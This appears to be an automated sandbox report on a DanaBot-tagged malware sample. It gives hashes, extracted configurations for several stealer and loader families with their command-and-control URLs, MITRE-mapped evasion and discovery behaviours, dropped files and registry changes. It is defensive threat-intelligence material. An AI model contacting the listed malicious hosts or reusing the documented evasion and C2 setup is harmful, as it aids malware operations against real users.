danabot | 1cdddf182f161ab789edfcc68a0706d0b8412a9ba67a3f918fe60fab270eabff

Analysis

max time kernel
66s
max time network
152s
platform
windows10_x64
resource
win10v20210408
submitted
11-08-2021 20:40

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

0965DA18BFBF19BAFB1C414882E19081.exe
Size

1.6MB
MD5

0965da18bfbf19bafb1c414882e19081
SHA1

e4556bac206f74d3a3d3f637e594507c30707240
SHA256

1cdddf182f161ab789edfcc68a0706d0b8412a9ba67a3f918fe60fab270eabff
SHA512

fe4702a2fde36b4fb0015ad7d3e2169a1ccbf5e29d7edef40f104ed47661b4b0365b13b1913e9f4e0ab7bc9ac542ee86c02a802a13567dfd0b8f5485a5be829b

Malware Config

Extracted

Family

vidar

Version

Botnet

937

https://lenak513.tumblr.com/

Attributes

profile_id
937

Extracted

Family

smokeloader

Version

2020

http://aucmoney.com/upload/

http://thegymmum.com/upload/

http://atvcampingtrips.com/upload/

http://kuapakualaman.com/upload/

http://renatazarazua.com/upload/

http://nasufmutlu.com/upload/

rc4.i32

Extracted

Family

vidar

Version

Botnet

916

https://lenak513.tumblr.com/

Attributes

profile_id
916

Extracted

Family

raccoon

Botnet

39b871ed120e56ecbdc546b8a8a78c4e5516bc1f

Attributes

url4cnc
https://telete.in/uiopoppiscess

rc4.plain

Extracted

Family

redline

Botnet

11_08_r

zertypelil.xyz:80

Extracted

Family

metasploit

Version

windows/single_exec

Signatures

Danabot
Danabot is a modular banking Trojan that has been linked with other malware.
trojan banker danabot

Danabot Loader Component 4 IoCs

Processes:

resource	yara_rule
\Users\Admin\DOCUME~1\88NIAS~1.TMP	DanabotLoader2021
behavioral2/memory/4872-225-0x0000000003F40000-0x000000000409F000-memory.dmp	DanabotLoader2021
\Users\Admin\DOCUME~1\88NIAS~1.TMP	DanabotLoader2021
C:\Users\Admin\DOCUME~1\88NIAS~1.TMP	DanabotLoader2021

Glupteba
Glupteba is a modular loader written in Golang with various components.
loader dropper glupteba

Glupteba Payload 2 IoCs

Processes:

resource	yara_rule
behavioral2/memory/3236-292-0x0000000003E20000-0x0000000004746000-memory.dmp	family_glupteba
behavioral2/memory/3236-296-0x0000000000400000-0x0000000003724000-memory.dmp	family_glupteba

MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
trojan backdoor metasploit
Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.

Processes:

rundll32.exe

description pid pid_target process target process

Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5160 3468 rundll32.exe
Raccoon
Simple but powerful infostealer which was very active in 2019.
stealer raccoon

description	pid	pid_target	process	target process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5160	3468	rundll32.exe

Raccoon Stealer Payload 1 IoCs

Processes:

resource	yara_rule
behavioral2/memory/2544-238-0x0000000000400000-0x0000000002CB5000-memory.dmp	family_raccoon

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine Payload 6 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\Documents\IvAce5EZkpqKU_vw7fu1TOdw.exe	family_redline
C:\Users\Admin\Documents\0yHLMcuS8aW3ZBPUvE0Sn0Dt.exe	family_redline
C:\Users\Admin\Documents\IvAce5EZkpqKU_vw7fu1TOdw.exe	family_redline
C:\Users\Admin\Documents\0yHLMcuS8aW3ZBPUvE0Sn0Dt.exe	family_redline
behavioral2/memory/4136-272-0x0000000000400000-0x000000000041E000-memory.dmp	family_redline
behavioral2/memory/4136-274-0x0000000000418F7A-mapping.dmp	family_redline

SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
evasion

Query Registry
T1012

Virtualization/Sandbox Evasion
T1497

Vidar Stealer 4 IoCs

stealer

Processes:

resource	yara_rule
behavioral2/memory/1784-189-0x0000000004810000-0x00000000048AD000-memory.dmp	family_vidar
behavioral2/memory/3856-191-0x00000000047B0000-0x000000000484D000-memory.dmp	family_vidar
behavioral2/memory/1784-211-0x0000000000400000-0x0000000002CC5000-memory.dmp	family_vidar
behavioral2/memory/3856-231-0x0000000000400000-0x0000000002CC5000-memory.dmp	family_vidar

Downloads MZ/PE file

Executes dropped EXE 23 IoCs

Processes:

sXv49KhZMiUAFPA7LnHyGcq6.exeY9W3py_a8Qpxfyh2wDzfI6x8.exe88niasm8OCnMjClDSX0zV4BD.exegq7oEv_Z_mAjT7UIBTCnPLai.exemLlTl5lYGvvDZjU93inUQAIv.exefigKcv1m9IVxbls3yV5W7DKY.exeIvAce5EZkpqKU_vw7fu1TOdw.exe0yHLMcuS8aW3ZBPUvE0Sn0Dt.exe6v1qd6wdAWQSWQKjWOTPLK5n.exebhwTOKBahvjc3nPBDtX_8bPT.exewzaiqINl3syh7wyruxwMYLwF.exe1TLBAhBXMZNz_LTblORBMbk8.exefV5iXs9tuRuDPO6zUO_y9ZE2.exe9SDJxAx3IjpQXwVHVx9qktlO.exep6fhhv5A75kXbpQhqDxG7DCB.exeGMZH71jb1up22BknQV4ZYz_T.exeICP1taBj0SFnPNnDmZVKDlIi.exetRyf6PLAuzTj9_gegE9tmrO0.exe7ryv8aRU0M0KkvSXU579AlN_.exeExT3RMqXppew8Ahh52EJMei0.exetRyf6PLAuzTj9_gegE9tmrO0.exeQtD25qxMVTK2g0iqoDIuScXm.exeQtD25qxMVTK2g0iqoDIuScXm.tmp

pid	process
1784	sXv49KhZMiUAFPA7LnHyGcq6.exe
2884	Y9W3py_a8Qpxfyh2wDzfI6x8.exe
3676	88niasm8OCnMjClDSX0zV4BD.exe
3960	gq7oEv_Z_mAjT7UIBTCnPLai.exe
3964	mLlTl5lYGvvDZjU93inUQAIv.exe
3236	figKcv1m9IVxbls3yV5W7DKY.exe
4036	IvAce5EZkpqKU_vw7fu1TOdw.exe
3580	0yHLMcuS8aW3ZBPUvE0Sn0Dt.exe
4052	6v1qd6wdAWQSWQKjWOTPLK5n.exe
3972	bhwTOKBahvjc3nPBDtX_8bPT.exe
3760	wzaiqINl3syh7wyruxwMYLwF.exe
3684	1TLBAhBXMZNz_LTblORBMbk8.exe
4176	fV5iXs9tuRuDPO6zUO_y9ZE2.exe
3808	9SDJxAx3IjpQXwVHVx9qktlO.exe
3952	p6fhhv5A75kXbpQhqDxG7DCB.exe
2544	GMZH71jb1up22BknQV4ZYz_T.exe
3804	ICP1taBj0SFnPNnDmZVKDlIi.exe
792	tRyf6PLAuzTj9_gegE9tmrO0.exe
3912	7ryv8aRU0M0KkvSXU579AlN_.exe
3856	ExT3RMqXppew8Ahh52EJMei0.exe
4768	tRyf6PLAuzTj9_gegE9tmrO0.exe
4892	QtD25qxMVTK2g0iqoDIuScXm.exe
5104	QtD25qxMVTK2g0iqoDIuScXm.tmp

VMProtect packed file 3 IoCs

Detects executables packed with VMProtect commercial packer.

vmprotect

Processes:

resource	yara_rule
C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe	vmprotect
behavioral2/memory/5084-312-0x0000000000400000-0x000000000067D000-memory.dmp	vmprotect
C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe	vmprotect

Checks BIOS information in registry 2 TTPs 4 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

IvAce5EZkpqKU_vw7fu1TOdw.exegq7oEv_Z_mAjT7UIBTCnPLai.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	IvAce5EZkpqKU_vw7fu1TOdw.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	IvAce5EZkpqKU_vw7fu1TOdw.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	gq7oEv_Z_mAjT7UIBTCnPLai.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	gq7oEv_Z_mAjT7UIBTCnPLai.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

0965DA18BFBF19BAFB1C414882E19081.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Control Panel\International\Geo\Nation	0965DA18BFBF19BAFB1C414882E19081.exe

Loads dropped DLL 3 IoCs

Processes:

fV5iXs9tuRuDPO6zUO_y9ZE2.exerundll32.exe

pid process

4176 fV5iXs9tuRuDPO6zUO_y9ZE2.exe
4872 rundll32.exe
4872 rundll32.exe

pid	process
4176	fV5iXs9tuRuDPO6zUO_y9ZE2.exe
4872	rundll32.exe
4872	rundll32.exe

Themida packer 6 IoCs

Detects Themida, an advanced Windows software protection system.

themida

Processes:

resource	yara_rule
C:\Users\Admin\Documents\IvAce5EZkpqKU_vw7fu1TOdw.exe	themida
C:\Users\Admin\Documents\gq7oEv_Z_mAjT7UIBTCnPLai.exe	themida
C:\Users\Admin\Documents\IvAce5EZkpqKU_vw7fu1TOdw.exe	themida
C:\Users\Admin\Documents\gq7oEv_Z_mAjT7UIBTCnPLai.exe	themida
behavioral2/memory/3960-228-0x0000000000E50000-0x0000000000E51000-memory.dmp	themida
behavioral2/memory/4036-239-0x0000000000990000-0x0000000000991000-memory.dmp	themida

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 2 IoCs

evasion trojan

System Information Discovery

T1082

Processes:

IvAce5EZkpqKU_vw7fu1TOdw.exegq7oEv_Z_mAjT7UIBTCnPLai.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	IvAce5EZkpqKU_vw7fu1TOdw.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	gq7oEv_Z_mAjT7UIBTCnPLai.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Looks up external IP address via web service 5 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

8 ipinfo.io
9 ipinfo.io
117 ipinfo.io
120 ipinfo.io
139 ip-api.com
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

Processes:

IvAce5EZkpqKU_vw7fu1TOdw.exegq7oEv_Z_mAjT7UIBTCnPLai.exe

pid process

4036 IvAce5EZkpqKU_vw7fu1TOdw.exe
3960 gq7oEv_Z_mAjT7UIBTCnPLai.exe
Suspicious use of SetThreadContext 1 IoCs

Processes:

tRyf6PLAuzTj9_gegE9tmrO0.exe

description pid process target process

PID 792 set thread context of 4768 792 tRyf6PLAuzTj9_gegE9tmrO0.exe tRyf6PLAuzTj9_gegE9tmrO0.exe

flow	ioc
8	ipinfo.io
9	ipinfo.io
117	ipinfo.io
120	ipinfo.io
139	ip-api.com

pid	process
4036	IvAce5EZkpqKU_vw7fu1TOdw.exe
3960	gq7oEv_Z_mAjT7UIBTCnPLai.exe

description	pid	process	target process
PID 792 set thread context of 4768	792	tRyf6PLAuzTj9_gegE9tmrO0.exe	tRyf6PLAuzTj9_gegE9tmrO0.exe

Drops file in Program Files directory 64 IoCs

Processes:

fV5iXs9tuRuDPO6zUO_y9ZE2.exeY9W3py_a8Qpxfyh2wDzfI6x8.exe

description	ioc	process
File created	C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-bg_flat_10_000000_40x100.png	fV5iXs9tuRuDPO6zUO_y9ZE2.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\requests\vlm.xml	fV5iXs9tuRuDPO6zUO_y9ZE2.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\requests\vlm_cmd.xml	fV5iXs9tuRuDPO6zUO_y9ZE2.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\modules\simplexml.luac	fV5iXs9tuRuDPO6zUO_y9ZE2.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-icons_228ef1_256x240.png	fV5iXs9tuRuDPO6zUO_y9ZE2.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\modules\dkjson.luac	fV5iXs9tuRuDPO6zUO_y9ZE2.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\access\libsdp_plugin.dll	fV5iXs9tuRuDPO6zUO_y9ZE2.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\access\libvcd_plugin.dll	fV5iXs9tuRuDPO6zUO_y9ZE2.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\js\controllers.js	fV5iXs9tuRuDPO6zUO_y9ZE2.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\intf\telnet.luac	fV5iXs9tuRuDPO6zUO_y9ZE2.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\meta\art\00_musicbrainz.luac	fV5iXs9tuRuDPO6zUO_y9ZE2.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\audio_output\libamem_plugin.dll	fV5iXs9tuRuDPO6zUO_y9ZE2.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\images\Other-48.png	fV5iXs9tuRuDPO6zUO_y9ZE2.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\access\libsmb_plugin.dll	fV5iXs9tuRuDPO6zUO_y9ZE2.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\control\libwin_msg_plugin.dll	fV5iXs9tuRuDPO6zUO_y9ZE2.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\intf\dumpmeta.luac	fV5iXs9tuRuDPO6zUO_y9ZE2.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\intf\modules\httprequests.luac	fV5iXs9tuRuDPO6zUO_y9ZE2.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\meta\art\03_lastfm.luac	fV5iXs9tuRuDPO6zUO_y9ZE2.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\playlist\cue.luac	fV5iXs9tuRuDPO6zUO_y9ZE2.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\audio_output\libwasapi_plugin.dll	fV5iXs9tuRuDPO6zUO_y9ZE2.exe
File created	C:\Program Files (x86)\lighteningplayer\libvlccore.dll	fV5iXs9tuRuDPO6zUO_y9ZE2.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-icons_ef8c08_256x240.png	fV5iXs9tuRuDPO6zUO_y9ZE2.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\js\common.js	fV5iXs9tuRuDPO6zUO_y9ZE2.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\playlist\anevia_xml.luac	fV5iXs9tuRuDPO6zUO_y9ZE2.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\playlist\appletrailers.luac	fV5iXs9tuRuDPO6zUO_y9ZE2.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\audio_output\libmmdevice_plugin.dll	fV5iXs9tuRuDPO6zUO_y9ZE2.exe
File opened for modification	C:\Program Files (x86)\Company\NewProduct\customer3.exe	Y9W3py_a8Qpxfyh2wDzfI6x8.exe
File created	C:\Program Files (x86)\lighteningplayer\data_load.exe	fV5iXs9tuRuDPO6zUO_y9ZE2.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\images\vlc-48.png	fV5iXs9tuRuDPO6zUO_y9ZE2.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\js\ui.js	fV5iXs9tuRuDPO6zUO_y9ZE2.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\requests\playlist.json	fV5iXs9tuRuDPO6zUO_y9ZE2.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\requests\playlist_jstree.xml	fV5iXs9tuRuDPO6zUO_y9ZE2.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\access\libidummy_plugin.dll	fV5iXs9tuRuDPO6zUO_y9ZE2.exe
File created	C:\Program Files (x86)\lighteningplayer\libvlc.dll	fV5iXs9tuRuDPO6zUO_y9ZE2.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\dialogs\equalizer_window.html	fV5iXs9tuRuDPO6zUO_y9ZE2.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\requests\README.txt	fV5iXs9tuRuDPO6zUO_y9ZE2.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\requests\playlist.xml	fV5iXs9tuRuDPO6zUO_y9ZE2.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\intf\dummy.luac	fV5iXs9tuRuDPO6zUO_y9ZE2.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\playlist\vimeo.luac	fV5iXs9tuRuDPO6zUO_y9ZE2.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\jquery-ui-1.8.13.custom.css	fV5iXs9tuRuDPO6zUO_y9ZE2.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\images\vlc16x16.png	fV5iXs9tuRuDPO6zUO_y9ZE2.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\custom.lua	fV5iXs9tuRuDPO6zUO_y9ZE2.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\playlist\koreus.luac	fV5iXs9tuRuDPO6zUO_y9ZE2.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\access\libimem_plugin.dll	fV5iXs9tuRuDPO6zUO_y9ZE2.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\access\libvdr_plugin.dll	fV5iXs9tuRuDPO6zUO_y9ZE2.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\control\libgestures_plugin.dll	fV5iXs9tuRuDPO6zUO_y9ZE2.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\mobile_equalizer.html	fV5iXs9tuRuDPO6zUO_y9ZE2.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-icons_ffd27a_256x240.png	fV5iXs9tuRuDPO6zUO_y9ZE2.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\dialogs\batch_window.html	fV5iXs9tuRuDPO6zUO_y9ZE2.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\images\Folder-48.png	fV5iXs9tuRuDPO6zUO_y9ZE2.exe
File opened for modification	C:\Program Files (x86)\Company\NewProduct\jooyu.exe	Y9W3py_a8Qpxfyh2wDzfI6x8.exe
File created	C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe	fV5iXs9tuRuDPO6zUO_y9ZE2.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\favicon.ico	fV5iXs9tuRuDPO6zUO_y9ZE2.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\dialogs\stream_window.html	fV5iXs9tuRuDPO6zUO_y9ZE2.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\playlist\dailymotion.luac	fV5iXs9tuRuDPO6zUO_y9ZE2.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\audio_output\libadummy_plugin.dll	fV5iXs9tuRuDPO6zUO_y9ZE2.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-bg_diagonals-thick_18_b81900_40x40.png	fV5iXs9tuRuDPO6zUO_y9ZE2.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\dialogs\create_stream.html	fV5iXs9tuRuDPO6zUO_y9ZE2.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\images\Back-48.png	fV5iXs9tuRuDPO6zUO_y9ZE2.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\images\speaker-32.png	fV5iXs9tuRuDPO6zUO_y9ZE2.exe
File created	C:\Program Files (x86)\lighteningplayer\hrtfs\dodeca_and_7channel_3DSL_HRTF.sofa	fV5iXs9tuRuDPO6zUO_y9ZE2.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\extensions\VLSub.luac	fV5iXs9tuRuDPO6zUO_y9ZE2.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\playlist\liveleak.luac	fV5iXs9tuRuDPO6zUO_y9ZE2.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\access\libaccess_realrtsp_plugin.dll	fV5iXs9tuRuDPO6zUO_y9ZE2.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 45 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
3976	4052	WerFault.exe	6v1qd6wdAWQSWQKjWOTPLK5n.exe
3544	3952	WerFault.exe	p6fhhv5A75kXbpQhqDxG7DCB.exe
2236	3952	WerFault.exe	p6fhhv5A75kXbpQhqDxG7DCB.exe
2240	4052	WerFault.exe	6v1qd6wdAWQSWQKjWOTPLK5n.exe
4848	3952	WerFault.exe	p6fhhv5A75kXbpQhqDxG7DCB.exe
4824	4052	WerFault.exe	6v1qd6wdAWQSWQKjWOTPLK5n.exe
3588	3952	WerFault.exe	p6fhhv5A75kXbpQhqDxG7DCB.exe
3604	4052	WerFault.exe	6v1qd6wdAWQSWQKjWOTPLK5n.exe
2888	3952	WerFault.exe	p6fhhv5A75kXbpQhqDxG7DCB.exe
3544	4052	WerFault.exe	6v1qd6wdAWQSWQKjWOTPLK5n.exe
4584	4052	WerFault.exe	6v1qd6wdAWQSWQKjWOTPLK5n.exe
2176	3856	WerFault.exe	ExT3RMqXppew8Ahh52EJMei0.exe
3840	4052	WerFault.exe	6v1qd6wdAWQSWQKjWOTPLK5n.exe
4688	1784	WerFault.exe	sXv49KhZMiUAFPA7LnHyGcq6.exe
3308	3952	WerFault.exe	p6fhhv5A75kXbpQhqDxG7DCB.exe
4400	3856	WerFault.exe	ExT3RMqXppew8Ahh52EJMei0.exe
4148	3952	WerFault.exe	p6fhhv5A75kXbpQhqDxG7DCB.exe
1560	1784	WerFault.exe	sXv49KhZMiUAFPA7LnHyGcq6.exe
1384	3856	WerFault.exe	ExT3RMqXppew8Ahh52EJMei0.exe
3916	1784	WerFault.exe	sXv49KhZMiUAFPA7LnHyGcq6.exe
4908	3856	WerFault.exe	ExT3RMqXppew8Ahh52EJMei0.exe
4540	1784	WerFault.exe	sXv49KhZMiUAFPA7LnHyGcq6.exe
4652	3856	WerFault.exe	ExT3RMqXppew8Ahh52EJMei0.exe
4120	1784	WerFault.exe	sXv49KhZMiUAFPA7LnHyGcq6.exe
4644	3856	WerFault.exe	ExT3RMqXppew8Ahh52EJMei0.exe
3272	1784	WerFault.exe	sXv49KhZMiUAFPA7LnHyGcq6.exe
3916	1784	WerFault.exe	sXv49KhZMiUAFPA7LnHyGcq6.exe
4208	3856	WerFault.exe	ExT3RMqXppew8Ahh52EJMei0.exe
3692	1784	WerFault.exe	sXv49KhZMiUAFPA7LnHyGcq6.exe
4480	3856	WerFault.exe	ExT3RMqXppew8Ahh52EJMei0.exe
4780	1784	WerFault.exe	sXv49KhZMiUAFPA7LnHyGcq6.exe
2952	3856	WerFault.exe	ExT3RMqXppew8Ahh52EJMei0.exe
1384	1784	WerFault.exe	sXv49KhZMiUAFPA7LnHyGcq6.exe
4720	3840	WerFault.exe	Runtimebroker.exe
5072	3856	WerFault.exe	ExT3RMqXppew8Ahh52EJMei0.exe
4612	3840	WerFault.exe	Runtimebroker.exe
4264	3840	WerFault.exe	Runtimebroker.exe
1536	3760	WerFault.exe	wzaiqINl3syh7wyruxwMYLwF.exe
4856	3856	WerFault.exe	ExT3RMqXppew8Ahh52EJMei0.exe
3164	3840	WerFault.exe	Runtimebroker.exe
1384	3840	WerFault.exe	Runtimebroker.exe
1460	3856	WerFault.exe	ExT3RMqXppew8Ahh52EJMei0.exe
4856	3840	WerFault.exe	Runtimebroker.exe
4752	3840	WerFault.exe	Runtimebroker.exe
5952	5536	WerFault.exe	svchost.exe

NSIS installer 2 IoCs

installer

Processes:

resource	yara_rule
C:\Users\Admin\Documents\fV5iXs9tuRuDPO6zUO_y9ZE2.exe	nsis_installer_2
C:\Users\Admin\Documents\fV5iXs9tuRuDPO6zUO_y9ZE2.exe	nsis_installer_2

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

mLlTl5lYGvvDZjU93inUQAIv.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	mLlTl5lYGvvDZjU93inUQAIv.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	mLlTl5lYGvvDZjU93inUQAIv.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	mLlTl5lYGvvDZjU93inUQAIv.exe

Delays execution with timeout.exe 1 IoCs
evasion

Processes:

timeout.exe

pid process

2836 timeout.exe

pid	process
2836	timeout.exe

Modifies system certificate store 2 TTPs 2 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

Processes:

0965DA18BFBF19BAFB1C414882E19081.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	0965DA18BFBF19BAFB1C414882E19081.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c000000010000000400000000080000090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	0965DA18BFBF19BAFB1C414882E19081.exe

Script User-Agent 2 IoCs

Uses user-agent string associated with script host/environment.

Processes:

description	flow	ioc
